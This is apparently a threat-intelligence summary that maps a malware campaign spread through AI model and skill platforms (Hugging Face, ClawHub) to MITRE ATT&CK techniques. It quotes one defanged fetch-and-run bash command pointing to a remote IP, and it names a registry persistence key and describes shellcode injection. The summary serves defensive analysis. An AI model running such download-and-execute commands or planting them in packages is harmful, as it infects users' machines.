Poisoning the well: AI supply chain attacks on Hugging Face and OpenClaw

MITRE Techniques

• [T1195 ] Supply Chain Compromise – Abusing AI distribution platforms to deliver malicious artifacts and scale malware distribution (‘abusing AI distribution platforms such as Hugging Face and ClawHub to deliver malware’)
• [T1204 ] User Execution (Social Engineering) – Use of enticing repo names, README social engineering and instructions that trick users into executing malware (‘Threat actors craft these packages with enticing repository names, attractive features and well-crafted README files’)
• [T1027 ] Obfuscated Files or Information – Use of obfuscation, encryption and base64-encoded command strings to hide true behavior (‘obfuscation, encryption’ and base64-encoded string to hide the actual command)
• [T1105 ] Ingress Tool Transfer – Downloading payloads from external hosts and repositories using curl/PowerShell and staging via repos (‘/bin/bash -c “$(curl -fsSL hxxp://91.92.242[.]30/6wioz8285kcbax6v)”‘)
• [T1059 ] Command and Scripting Interpreter – Use of PowerShell and shell scripts as droppers and execution vectors (‘PowerShell script served by the Cloudflare workers endpoint’ and bash commands used to execute downloaded scripts)
• [T1055 ] Process Injection – In-memory injection into explorer.exe by allocating memory, writing shellcode and creating a remote thread (‘writes the decoded shellcode and launches it via a remote thread’)
• [T1547 ] Boot or Logon Autostart Execution – Persistence via Registry Run key creation to achieve startup persistence (‘adds a Run key (5PthNvuYXu) under HKCUSoftwareMicrosoftWindowsCurrentVersionRun’)
• [T1071 ] Application Layer Protocol (C2) – Covert command-and-control communication using web hosts, messaging links and staged repositories (‘covert command-and-control (C2) communication’)